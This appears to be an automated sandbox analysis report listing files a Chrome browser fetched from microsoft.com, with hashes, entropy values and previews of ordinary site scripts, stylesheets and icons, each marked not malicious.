                                                                                                                                                                                                                                                          Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3164)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):34401
                                                                                                                                                                                                                                                          Entropy (8bit):5.567515913811421
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                                                                                                                                                          MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                                                                                                                                                          SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                                                                                                                                                          SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                                                                                                                                                          SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-httpclient.min.ACSHASH5ee9e4e4e0a5fd39092e63d2d102b12b.js
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (24837)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24949
                                                                                                                                                                                                                                                          Entropy (8bit):5.2312828786862395
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:K7+WdVXKV66F7epKZ3miCVss9hLTrheXSJ8:K7+WDmrFCpKZwVT3rUXSJ8
                                                                                                                                                                                                                                                          MD5:CDAC009AA733269D648461499E0869F2
                                                                                                                                                                                                                                                          SHA1:C74BBB5EDC41B9DB60EF45262DF964E7E60A3272
                                                                                                                                                                                                                                                          SHA-256:2E38BC618D4A4277FE6D05DA9272A916D12515FB4533C600A4EAE77F68007437
                                                                                                                                                                                                                                                          SHA-512:1C9F4CF40DEB7D5E7FA83B3DEE4D5B5AAADCB5A20AEF61DCE2B4A0A1037225E5FB3493F92BCE40F04A02CA9EB791F1AFE6F28A47E3D72F432B2DDF61F3AF45E7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-02-14T10:24:39Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENe5ac16c0abde4e0db8a4cd055e2bbf71",stage:"production"},dataElements:{cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{core:{displayName:"Core",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP2e2f86ba46954a2b8a2b3bb72276b9f8/",modules:{"core/src/lib/dataElements/randomNumber.js":{name:"random-number",displayName:"Random Number",script:function(e){"use strict";e.exports=function(e){var n=Math.ceil(e.min),t=Math.floor(e.max);return n>t?NaN:Math.floor(Math.random()*(t-n+1))+n}}}}}},company:{orgId:"EA76ADE95776D2EC7F000101@AdobeOrg",dynamicCdnEnable
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11232
                                                                                                                                                                                                                                                          Entropy (8bit):4.6331503450371505
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:tgwsKEAOoPWvmsljFvgWIxQ7Mvdtdt+6HaAyawyQnMvxgGZUOxhBLz6PsF7TAVNQ:OKbO97gW54VPiTpnMvxDXVWxRWeE
                                                                                                                                                                                                                                                          MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                                                                                                                                          SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                                                                                                                                          SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                                                                                                                                          SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                          Entropy (8bit):4.971196656935236
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                                                                                                                                                          MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                                                                                                                                                          SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                                                                                                                                                          SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                                                                                                                                                          SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):159
                                                                                                                                                                                                                                                          Entropy (8bit):4.661188988961239
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                                                                                                                                                          MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                                                                                                                                                          SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                                                                                                                                                          SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                                                                                                                                                          SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/featurecontrol.min.ACSHASHc22ea5b46f3fcad90da0abcc0a3f73d4.js
                                                                                                                                                                                                                                                          Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):293
                                                                                                                                                                                                                                                          Entropy (8bit):4.99262841309604
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:tnrwdhC/gKumc4slvICHfk4SYvBSKqdioEEdTc3RzSkgOktT4ekirDSM:trwdU/gKuCCHs41vBFLEd0R+hB1Dh
                                                                                                                                                                                                                                                          MD5:59873FBD0C6D18034F7CBCB0CE44CDAA
                                                                                                                                                                                                                                                          SHA1:0F5CBFB885FE94082A9BE9E5B73F23384A7F7368
                                                                                                                                                                                                                                                          SHA-256:B184ABEF90675ABAE98CB7F10796D0B82EC0F01D847A531DA87EACA9FC6E891E
                                                                                                                                                                                                                                                          SHA-512:89A5D1CC5B4DE5F113D9FACDDB31ED18F0FA87DB91253A57728D2301246C7F677799C6DED77D297C96ED60D91923B99CA7AE2407A290B0A52D64F749302346C5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Publish-your-report.svg
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24 6.43359V22.5H7.5V0H17.5664L24 6.43359ZM18 6H21.4336L18 2.56641V6ZM22.5 21V7.5H16.5V1.5H9V21H22.5ZM0 7.5H6V9H0V7.5ZM1.5 10.5H6V12H1.5V10.5ZM3 13.5H6V15H3V13.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):544
                                                                                                                                                                                                                                                          Entropy (8bit):5.221040627274746
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                                                                                                                                                          MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                                                                                                                                          SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                                                                                                                                          SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                                                                                                                                          SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js
                                                                                                                                                                                                                                                          Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x428, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11094
                                                                                                                                                                                                                                                          Entropy (8bit):7.983273477396938
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:bd/cu6XW87r1uT0tBjgeb9HZpZb08Ti/IMHLLc6FTqkU6Vl6lfmXkZ7r:B0r37ZS0tBEebhZpZb087QLL9c1fm01
                                                                                                                                                                                                                                                          MD5:4A52059E5724C7B556D74E5FC3D0108E
                                                                                                                                                                                                                                                          SHA1:BE75CD316DF8806CAB548B54858960AA15377AC2
                                                                                                                                                                                                                                                          SHA-256:06E3D819220C54F44C891C3FC1170CCCBCC3F88557AE728CA7073A8800A520D3
                                                                                                                                                                                                                                                          SHA-512:A168C6D1EFCA4F930868FC338DA901ACB1F454F057C6EFC81D918014FC19556E4CAAF0C6B2054BAE4AB60C0F1B40B65A2964E589D1846D93D84D7ABB2316514A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFFN+..WEBPVP8 B+..p....*@...>...B!......a--.+M. ]?O..(..'..o...U......$.:...}.?.....m...<.}.........~..........sx.z..[......|OP...@?.._.Y.........|...O._...~....?F....u.*\t..../L...`0....vs4..I..W...o......>+|...0.2....Le.o.zGn...z..DW..k....ft...K...gB....qQ...1.4..#.e<!BP.DR.........9....."7..i.rXZp....buQ.....Ky....3..e{.\. m...k0......P.....-.......w...qO......o...{...W.....w9?..g.W...""E.]$........(...a..O........RQ.....-?.y.....^8.k....N....!".W..Ltr........p..@.P....Uq..>?i.S.=...4.-...f.?G4....@..B.({.i..PQC.&.o.j...S-.?...^O@""......t.B.#..D....YjK..8....7|q.,c..%.$.4T...h.B.6j.#.....s.E.O...6..#....B[...^....?.-...`.y....=..U$.'..b|s...l!=....m.6\.h|D..e..#.j....!Q..M.gf..Q.....l.H.2'.w.X..E.P.{5.S....c..E.....*0d}e9.*.....#5y!.Q.NX..U.I@e.N.0.1.x..ELg".M...I.d...y...~.....J.tw..;.....4{?.8..Z....Aa....l..Y.....fTE.ho_.a.&oI......a...T%.F.9.2.....q....=..L..f./...._..t.f.=[..QS&.:.?.G.~_Or...QO.G....x.q.)d.x...5....DC2.!.....!qb
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                          Entropy (8bit):5.16775955111282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:trwdU/gKutHVBjtaVzSY4xR0YsXXaStQlEtlvmdEKiHAie:tYU/dutH7kSYuiYsXKSeq2EKHb
                                                                                                                                                                                                                                                          MD5:D79B55527411C8B4157E788A5D6A041C
                                                                                                                                                                                                                                                          SHA1:16B3D69B7CB1A9827891A4C53A4CFD605FD9EC50
                                                                                                                                                                                                                                                          SHA-256:E3A6022BCA2F8C91D8322A65AD6CAD1FAB3DC32560892E2C2817A0D47DDF2472
                                                                                                                                                                                                                                                          SHA-512:2491498851E30A03DCB970C6B940F1055426BD5EA92505090018BE6800F6D557CBB2EDE741D8AC4023367AF140C7D0BE2276E3EC02ECBDE147C73C877DD04B5B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4525)">.<path d="M22.5 15H18V4.5H22.5V15ZM0 12H4.5V19.5H0V12ZM16.5 18H15V19.5H12V0H16.5V18ZM6 4.5H10.5V19.5H6V4.5ZM24 19.5V21H21V24H19.5V21H16.5V19.5H19.5V16.5H21V19.5H24Z" fill="#0078D4"/>.</g>.<defs>.<clipPath id="clip0_2826_4525">.<rect width="24" height="24" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (509)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):775
                                                                                                                                                                                                                                                          Entropy (8bit):5.006726191017576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Tb0grd1xT5FeKlqyE8J6V8JIxbMfex8mAXpydmc7:Tb9k46tCfeLAXpyIc7
                                                                                                                                                                                                                                                          MD5:FE68B59E840A1A274393B3AB03C85E96
                                                                                                                                                                                                                                                          SHA1:C8C1B1196B05E9ADB6D342390956A231920B2017
                                                                                                                                                                                                                                                          SHA-256:9F01AEA27D73C422AC5E7E87C2F7F3CE364E1F940FAEB6CF3178B5E13CB43497
                                                                                                                                                                                                                                                          SHA-512:58921A6195363008A3DD65AF8D115828C3F93FB23CCCC9FB5D2FAF7AF55F5779EFBA947B990DEDF5B2751F3ED0BA4071F006873FFB68F77CCA3C8D565092A90D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(function(e){e.addEventListener("DOMContentLoaded",()=>{const a=$(".faq-collapse"),f={"bi-bhvr":{off:a.data("expandbhvr"),on:a.data("collapsebhvr")},"bi-cn":{off:a.data("expand"),on:a.data("collapse")},"bi-ecn":{off:a.data("enexpand"),on:a.data("encollapse")},"bi-ct":{off:a.data("expandtemplatename"),on:a.data("collapsetemplatename")}},d=b=>{const g=b.triggerElement.classList.contains("collapsed");Object.entries(f).forEach(([h,c])=>{b.triggerElement.setAttribute(`data-${h}`,g?c.off:c.on)})},.k=window.ocrReimagine.CollapseExtension.getInstances().filter(b=>b.triggerElement.classList.contains("ocr-faq-item__header"));0<a.length&&k.forEach(b=>{b.el.addEventListener("onHidden",d.bind(this,b));b.el.addEventListener("onShown",d.bind(this,b))})})})(document);
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (590)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1716
                                                                                                                                                                                                                                                          Entropy (8bit):5.2304068952006615
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                                                                                                                                                          MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                                                                                                                                                          SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                                                                                                                                                          SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                                                                                                                                                          SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1973
                                                                                                                                                                                                                                                          Entropy (8bit):4.4914538760871165
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:xCgigRgQgGKgeg5Cgfgy7gBgugDgBCgRgogvg+gdg27eG8T5aW:IlmvhK5TQX7WpMV8V2HgDeG8taW
                                                                                                                                                                                                                                                          MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                                                                                                                                          SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                                                                                                                                          SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                                                                                                                                          SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                                                                                                                                          Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2235
                                                                                                                                                                                                                                                          Entropy (8bit):4.235908927621097
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:/PuSVWTPvaDTFRE1byCd88PuIMJZ1G+z1/wi8Iy6W35yPlmOV3XkT:e/7i41hP4JSpig6W3IPlmOuT
                                                                                                                                                                                                                                                          MD5:1D6526DEA1E377470F4EDB86A75D6273
                                                                                                                                                                                                                                                          SHA1:DE8EE2F5C4C7BB79851BCE11FEC4CFD13A6D3F74
                                                                                                                                                                                                                                                          SHA-256:01B6F7E2663BAAD2460C51316B6C0132DC88FEC6E91AA7B22F08AD4BECC3DFAB
                                                                                                                                                                                                                                                          SHA-512:58461D566C1EC9DF0018175FEE437EA4941F9E091A242F635BAC9EFA75330CF8119B7918E9D2F96A0C281743100F754E014C6B683D58B07958D3D046D2A6EE9F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Uncover-report-insights.svg
                                                                                                                                                                                                                                                          Preview:<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4519)">.<path d="M19.25 11H22V13.0518C22 13.46 21.932 13.8503 21.7959 14.2227C21.6598 14.5951 21.4665 14.9352 21.2158 15.2432C20.9652 15.5511 20.6715 15.8053 20.335 16.0059C19.9984 16.2064 19.6224 16.346 19.207 16.4248L19.2178 16.1562C19.1748 16.5286 19.0781 16.8796 18.9277 17.209C18.7773 17.5384 18.584 17.8392 18.3477 18.1113C18.1113 18.3835 17.8356 18.6126 17.5205 18.7988C17.2054 18.985 16.8652 19.1139 16.5 19.1855V20.625H19.25V22H12.375V20.625H15.125V19.1855C14.7598 19.1139 14.4196 18.985 14.1045 18.7988C13.7894 18.6126 13.5137 18.387 13.2773 18.1221C13.041 17.8571 12.8477 17.5563 12.6973 17.2197C12.5469 16.8831 12.4502 16.5286 12.4072 16.1562L12.418 16.4248C12.0098 16.3389 11.6374 16.1921 11.3008 15.9844C10.9642 15.7767 10.6706 15.526 10.4199 15.2324C10.1693 14.9388 9.97591 14.6094 9.83984 14.2441C9.70378 13.8789 9.63216 13.4814 9.625 13.0518V11H12.375V9.625
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2432
                                                                                                                                                                                                                                                          Entropy (8bit):4.834130257531367
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:s9JaZbpyRv71XBd8jByZJ4JaWuOjZPpHy6oTUU4yKN7y+J4WPM+Nd:0AZdABXLEUZOxjZPo6S1G7es
                                                                                                                                                                                                                                                          MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                                                                                                                                          SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                                                                                                                                          SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                                                                                                                                          SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
